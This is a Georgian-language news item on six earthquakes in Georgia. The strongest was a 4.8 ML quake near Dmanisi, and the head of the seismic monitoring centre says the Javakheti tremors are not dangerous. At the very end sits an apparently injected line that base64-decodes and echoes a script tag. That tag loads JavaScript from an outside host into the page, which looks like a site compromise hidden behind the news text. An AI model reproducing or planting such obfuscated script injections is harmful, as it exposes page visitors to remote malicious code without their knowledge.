celsiusi
ავერსი შნაიდერი
დღეს დილით, დედამიწის შემსწავლელ მეცნიერებათა ინსტიტის და სეისმური მონიტორინგის ეროვნული ცენტრის ინფორმაციით, საქართველოში 6 მიწისძვრა მოხდა. 
 
მათი მინიმალური სიმძლავრე 3. 0 (ml)– ით, ხოლო მაქსიმალური 4. 8 (ml)მაგნიტუდით განისაზღვრა, რომელიც ასევე იგრძნობოდა თბილისში. 
 
აღნიშნულთან დაკავშირებით, საინფორმაციო სააგენტო BUSINESS TIME სეისმური მონიტორინგის ცენტრის ხელმძღვანელს თეა გოდოლაძეს ესაუბრა. მისი თქმით ჯავახეთში მოცემული სიტუაცია სეისმურად არანაირ საშიშროებას არ წარმოადგენს და საპანიკო არაფერია. 
 
"პირიქით ეს უკეთესიცაა, რომ ასეთი მცირე ბიძგებით, ნიადაგი თავისუფლდება, მით უფრო რომ ჯავახეთი ეს არის ნაკლებად დატვირთული მხარე და იქ ასეთი მცირე ბიძგები საფრთხეს არ წარმოადგენს, რასაც ვერ ვიტყვი დედაქალაქზე ვინაიდან, დედაქალაქში ჩვენ გვახსოვს რომ 2002 წელს, საშუალო სიმძლავრის მიწისძვრამ მსხვერპლიც კი გამოიწვია."– განაცხადა თეა გოდოლაძემ. 
 
მან, ასევე აღნიშნა, რომ ადრეც ასეთივე სიხშირით ხდებოდა მიწისძვრები, თუმცა ამის მონიტორინგის შესახებ ადამიანებს ასე ინტენსიურად ვერ მიეწოდებოდათ ინფორმაცია, ტექნიკური პირობების გამო, დღევანდელი მოცემულობა კი იძლევა ამის საშუალებას და შესაბამისად ცენტრი ავრცელებს ინფორმაციას. 
 
ცნობისთვის დღეს დილით, 07.36 საათზე, მიწისძვრა დაფიქსირდა. დმანისიდან სამხრეთ-დასავლეთით 25 კილომეტრში, სოფელ სამებასთან იყო და მისი სიმძლავრე 4. 8 (ml) მაგნიტუდას შეადგენდა.
 
მათივე ცნობით, დმანისიდან სამხრეთ-დასავლეთით 25 კილომეტრში, სოფელ სამებასთან იყო და მისი სიმძლავრე 3. 0 (ml) მაგნიტუდას შეადგენდა. მოგვიანებით, კი ბოლო 2 საათში 4 ასეთი მცირე ზომის ბიძგი იგრძნობოდა.  
 
 
 
719
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");